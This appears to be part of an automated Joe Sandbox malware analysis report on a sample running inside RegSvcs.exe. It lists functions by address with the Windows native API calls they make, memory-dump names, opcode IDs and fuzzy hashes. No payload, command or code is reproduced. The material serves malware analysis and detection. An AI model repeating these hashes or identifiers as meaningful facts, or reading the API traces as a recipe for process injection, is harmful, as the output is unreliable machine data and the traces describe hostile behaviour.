nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ca5b600953562cb235ff166966406e0cffa4ac7d2a629d12d66fb924f5bd2c5b
Instruction ID: de4975a1dc630eda2d31b694e614a27c36747b36dd4658bc9b616e2dc1f551a0
Opcode Fuzzy Hash: ca5b600953562cb235ff166966406e0cffa4ac7d2a629d12d66fb924f5bd2c5b
Instruction Fuzzy Hash: 3E115271D092289EEF24CBB0DC81ADEB7B4EB44724F64022EE913B71A1D3751D558F45

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF97 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,004188C3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004188C3,00000000,00000005,00000060,00000000,00000000), ref: 0041DFE4

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction ID: ba109b50b27caff7beec7b60acac014510998ede28b53b5d30833cc0ae739639
Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction Fuzzy Hash: C5F0BDB6200208ABCB08DF89DC85EEB37ADAF8C754F018208FA0997241D630F851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E041 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00418A87,00413D5B,FFFFFFFF,00418571,00000206,?,00418A87,00000206,00418571,FFFFFFFF,00413D5B,00418A87,00000206,00000000), ref: 0041E08C

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d7d95d3b5c16bbb68ab7420276999e2fd5af1a4217e40a4910fa5e4fce57046c
Instruction ID: 7b13284fabba68feb758d5c9c06f18de55117b75e5c29c3cf2f3c8a3aa71cbfc
Opcode Fuzzy Hash: d7d95d3b5c16bbb68ab7420276999e2fd5af1a4217e40a4910fa5e4fce57046c
Instruction Fuzzy Hash: 4AF01DB62000496BCB18DF99DC90CEB7BA9EF8C214B15834DFD5C93215C530E851CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041E047 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00418A87,00413D5B,FFFFFFFF,00418571,00000206,?,00418A87,00000206,00418571,FFFFFFFF,00413D5B,00418A87,00000206,00000000), ref: 0041E08C

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction ID: 02fdc3be1a16fc9b5f1df82949d90ce2fe92d1607ac2838565e474cee3ec46ca
Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction Fuzzy Hash: 19F0A4B6200108ABCB14DF89DC85EEB77ADAF8C754F118249FE0D97241D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0C1 Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00418A65,00000206,?,00418A65,00000005,FFFFFFFF), ref: 0041E0EC

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 451f0b4b1b9db0fcd505369d9086488854ae5d99f043b34c98f86115eb79d22e
Instruction ID: 677ff3059cfa54c021b26d6f6cf4f911f59d6a11b30ecd195fcccaca6aaae927
Opcode Fuzzy Hash: 451f0b4b1b9db0fcd505369d9086488854ae5d99f043b34c98f86115eb79d22e
Instruction Fuzzy Hash: 79E08C3A2001006ADB24EBB9CC89EDB3F68DF44254F004195F90C9B242D635E500CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0C7 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00418A65,00000206,?,00418A65,00000005,FFFFFFFF), ref: 0041E0EC

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction ID: 2dc4cbe162118e15d0a2127a10af7ccca67d2459098875331d67163244fcb7b4
Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction Fuzzy Hash: A2D01776200214ABD614EBA9DC89ED77BACDF48664F014155FA0C5B242D630FA008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF98FA

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b697a50d8fa071a46a5880cc3ea6a3a3f249bd2f4e0c123ba2f7c87a8af2484
Instruction ID: aed26490f70e925f2c32bcbc7b071fe58f56402112de5059fa8e415c48d6fc47
Opcode Fuzzy Hash: 8b697a50d8fa071a46a5880cc3ea6a3a3f249bd2f4e0c123ba2f7c87a8af2484
Instruction Fuzzy Hash: 6D90026160100A02E10271D98404A16010AA7D0281F91C022A1414559ECAA58992B271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF986A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebef7c4d0c8f6cd335c90ef70a981091526946f84294004794227014864cd326
Instruction ID: 9a75dc9e0980065139fc50bdbc4822441219c6a5fe93babe569819acfda7f947
Opcode Fuzzy Hash: ebef7c4d0c8f6cd335c90ef70a981091526946f84294004794227014864cd326
Instruction Fuzzy Hash: 9D90027120100913E11261D98504B070109A7D0281F91C412A081455CDD6D68952B271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF984A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb9c018f5386bb636b0b42148dad75073d2113647c5f19cb9b9e62ba89d3c943
Instruction ID: bb1cd515df696f5f701151a1377db739d6bc4f19ee87c925b3d21274890d9b79
Opcode Fuzzy Hash: bb9c018f5386bb636b0b42148dad75073d2113647c5f19cb9b9e62ba89d3c943
Instruction Fuzzy Hash: D2900261242046526546B1D984049074106B7E0281B91C012A1804954CC5A69856E771

Uniqueness

Uniqueness Score: -1.00%

Function 00FF99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF99AA

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d341e987f0637fb60bb8796e7ab1751ec2a3aa86a38a427a58598615bf15d8a4
Instruction ID: 110d4b83d868f063e933613f53a57bee277fff10c321d106fcae39e20fe44f91
Opcode Fuzzy Hash: d341e987f0637fb60bb8796e7ab1751ec2a3aa86a38a427a58598615bf15d8a4
Instruction Fuzzy Hash: 109002A134100942E10161D98414F060105E7E1341F51C015E1454558DC699CC527276

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF991A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ba6f4b1c409977cd87ed7e1720b232ea31e80bf2922c0c55bf7290c301918ca
Instruction ID: 5e1095a4a45baf1d2d4f01073290cf2b48ff4dd7443be5db0b4ee3c133419d36
Opcode Fuzzy Hash: 8ba6f4b1c409977cd87ed7e1720b232ea31e80bf2922c0c55bf7290c301918ca
Instruction Fuzzy Hash: 5F9002B120100902E14171D98404B460105A7D0341F51C011A5454558EC6D98DD577B5

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF9A5A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a0bdd38dc48626e1859d247715b801fa167e967ee38262782c4d7f78bf6cc15
Instruction ID: ac7bebedb848b1680bc78f4d058a329f8173942ce00aa93c84407be9d4a839fe
Opcode Fuzzy Hash: 7a0bdd38dc48626e1859d247715b801fa167e967ee38262782c4d7f78bf6cc15
Instruction Fuzzy Hash: 7A90026121180542E20165E98C14F070105A7D0343F51C115A0544558CC99588616671

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF9A2A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6879ee1ab88a6a6e822ac706551d99805026b3a5a2430b154c1040fd5515f1f3
Instruction ID: 58b089571c937222ed257575da31ce99be43c1683e561e80019ea2a83c6d2ac4
Opcode Fuzzy Hash: 6879ee1ab88a6a6e822ac706551d99805026b3a5a2430b154c1040fd5515f1f3
Instruction Fuzzy Hash: F190026160100542514171E9C844D064105BBE1251B51C121A0D88554DC5D9886567B5

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF9A0A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e40e73b6ac461e4e8a000f12969f84f308678cc76a5f7e78f8549cc0c2264a69
Instruction ID: 3dbd2b3984d49be2a096a3832a6ce4def4c1d3b615cbba65b0731199fec9ff5e
Opcode Fuzzy Hash: e40e73b6ac461e4e8a000f12969f84f308678cc76a5f7e78f8549cc0c2264a69
Instruction Fuzzy Hash: 6590027120140902E10161D98814B0B0105A7D0342F51C011A1554559DC6A5885176B1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF95DA

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9c2955ef343483175f175ff651c659485a39a17048ddd6f4cf05d91912edded
Instruction ID: 89e10f8ecdb2982e1fa8cea2b5a037b5f9603b89518a2e300336f651ec181fc1
Opcode Fuzzy Hash: d9c2955ef343483175f175ff651c659485a39a17048ddd6f4cf05d91912edded
Instruction Fuzzy Hash: DC9002A120200503510671D98414A16410AA7E0241F51C021E1404594DC5A588917275

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF954A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9973dc0894c5d56b209e0509d9dacad7863a3a9a304cc1d600c7e0ce097b1921
Instruction ID: dcf557f7af45741f35c2a02b95fa78b00f9f2c99f216055b0c14efc701251fba
Opcode Fuzzy Hash: 9973dc0894c5d56b209e0509d9dacad7863a3a9a304cc1d600c7e0ce097b1921
Instruction Fuzzy Hash: 0E900265211005031106A5D947049070146A7D5391751C021F1405554CD6A188616271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF96EA

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a2b203609e7b8c8ebaebe32153aac0d1995d83a7710006520b8d88064c100d5
Instruction ID: 4d60f07130e35212790cc47a67b7c0e791ae4ce1409add4da09750f139d75445
Opcode Fuzzy Hash: 1a2b203609e7b8c8ebaebe32153aac0d1995d83a7710006520b8d88064c100d5
Instruction Fuzzy Hash: 5090027120108D02E11161D9C404B4A0105A7D0341F55C411A481465CDC6D588917271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF966A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7c44353830c54e0956bb265ed2689683a3b7ec99dd50f42409937e93f258455
Instruction ID: 5c7ae73ff28cb412edfd234d3f7d0161796fb5d16322a37898a1fed36fb816a4
Opcode Fuzzy Hash: b7c44353830c54e0956bb265ed2689683a3b7ec99dd50f42409937e93f258455
Instruction Fuzzy Hash: 0D90027120100D02E18171D98404A4A0105A7D1341F91C015A0415658DCA958A5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF9FEA

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0bee2330f311016b8bd8d2c1907f19339a091ca3c4cb15c318985cc7e6efd1ad
Instruction ID: 568c0a6fd9c01bf18064c0b2a9c3e59e0b368fa9410b5ed6013d943c73a0d6ee
Opcode Fuzzy Hash: 0bee2330f311016b8bd8d2c1907f19339a091ca3c4cb15c318985cc7e6efd1ad
Instruction Fuzzy Hash: 4990027131114902E11161D9C404B060105A7D1241F51C411A0C1455CDC6D588917272

Uniqueness

Uniqueness Score: -1.00%

Function 00FF97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF97AA

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c947a452403224727474dae672cc9959a870d4a81552ca84683d52d3e12b316
Instruction ID: f156575074fce61bcba81e1fe000cdf2faf380b7c3ec907429185fee42fc666a
Opcode Fuzzy Hash: 1c947a452403224727474dae672cc9959a870d4a81552ca84683d52d3e12b316
Instruction Fuzzy Hash: 6890026130100503E14171D99418A064105F7E1341F51D011E0804558CD99588566372

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF978A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab7bc1a63855af528f51e423f29372dfc5b43f1aa067071910ad7c50935dac0c
Instruction ID: d04b999de924bb15ed9a4953e71642bf242298aaa7bcad246d463aaea9d63c48
Opcode Fuzzy Hash: ab7bc1a63855af528f51e423f29372dfc5b43f1aa067071910ad7c50935dac0c
Instruction Fuzzy Hash: DA90026921300502E18171D99408A0A0105A7D1242F91D415A040555CCC99588696371

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FF971A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 986be5cfcd3a72e286bc62c3b267d4ac988c475d4957d5176750158be18e1f23
Instruction ID: dfdff07b39d83e19df19157f1d6165a15ae0a1eb21774631de63599408f6eb4a
Opcode Fuzzy Hash: 986be5cfcd3a72e286bc62c3b267d4ac988c475d4957d5176750158be18e1f23
Instruction Fuzzy Hash: 6090027120100902E10165D99408A460105A7E0341F51D011A5414559EC6E588917271

Uniqueness

Uniqueness Score: -1.00%

Function 00408E4F Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408EB1

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d1e7fd3f4d84b4006b68fdcd4b46d4b2f599591432ce542e6f62bb6819570f0d
Instruction ID: 1967bc7cbe72ae87cbb0387f1fc43736bb65942b0125952fca6d4a454a829b46
Opcode Fuzzy Hash: d1e7fd3f4d84b4006b68fdcd4b46d4b2f599591432ce542e6f62bb6819570f0d
Instruction Fuzzy Hash: D001B931A8022877E720A6A19C42FFE766C9F01B54F04411DFE44BA1C1E6E8690647EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408E57 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408EB1

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 1638315002febc8c636f513048e7be2efe8d0496fcc59c30795320312f4960d4
Instruction ID: e9617cdabeec7ce0e7f5e7cc4782d8b9b1ce283c26bbc6c3eeead2e0c1b16432
Opcode Fuzzy Hash: 1638315002febc8c636f513048e7be2efe8d0496fcc59c30795320312f4960d4
Instruction Fuzzy Hash: 62018831A4022877E720A6959C43FFF766C9B00B54F04412DFF04BA5C1EAA8690647E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3F7 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C469

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ecc15f4183104c3dff631d701cb029f5af5c1403713d6d9354f9e643c3009970
Instruction ID: 7116ccafade38d58ddb82d733afb1f70adecf6cfb9d3382ded709f176a1b5dce
Opcode Fuzzy Hash: ecc15f4183104c3dff631d701cb029f5af5c1403713d6d9354f9e643c3009970
Instruction Fuzzy Hash: F10116B5E0010DE7DF10DBA5DC42FDEB3B89F54704F0041A5E90897241F635EB588755

Uniqueness

Uniqueness Score: -1.00%

Function 00408E1A Relevance: 1.5, APIs: 1, Instructions: 40
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408EB1

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e46873b088f0fc2627b27ea0b50101a66bfa58afc883b912e58119e17be9e4b0
Instruction ID: b69776733cf88a617da21ce98d66b24ee267656d09dfd47db25265087b014c53
Opcode Fuzzy Hash: e46873b088f0fc2627b27ea0b50101a66bfa58afc883b912e58119e17be9e4b0
Instruction Fuzzy Hash: CBF02E3164021436E610B555BC43FFB361CDB50B65F04407FFA08E61C1EFA9A90682E6

Uniqueness

Uniqueness Score: -1.00%

Function 0041E3F8 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F479,0040F479,?,00000000,?,?), ref: 0041E437

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 849c5f8de400cb653b04cd9f1e6eaa35a5c45bf7c83d42e71393588a8a3a251f
Instruction ID: 36427558e7c585ed1697af91000655190b3fc8b8b41899959b7fe16038ad7da6
Opcode Fuzzy Hash: 849c5f8de400cb653b04cd9f1e6eaa35a5c45bf7c83d42e71393588a8a3a251f
Instruction Fuzzy Hash: 0BF027B22003046BCB20EF64CC41ED7B7989F49214F144919FC0897641DA31E801C7A0

Uniqueness

Uniqueness Score: -1.00%

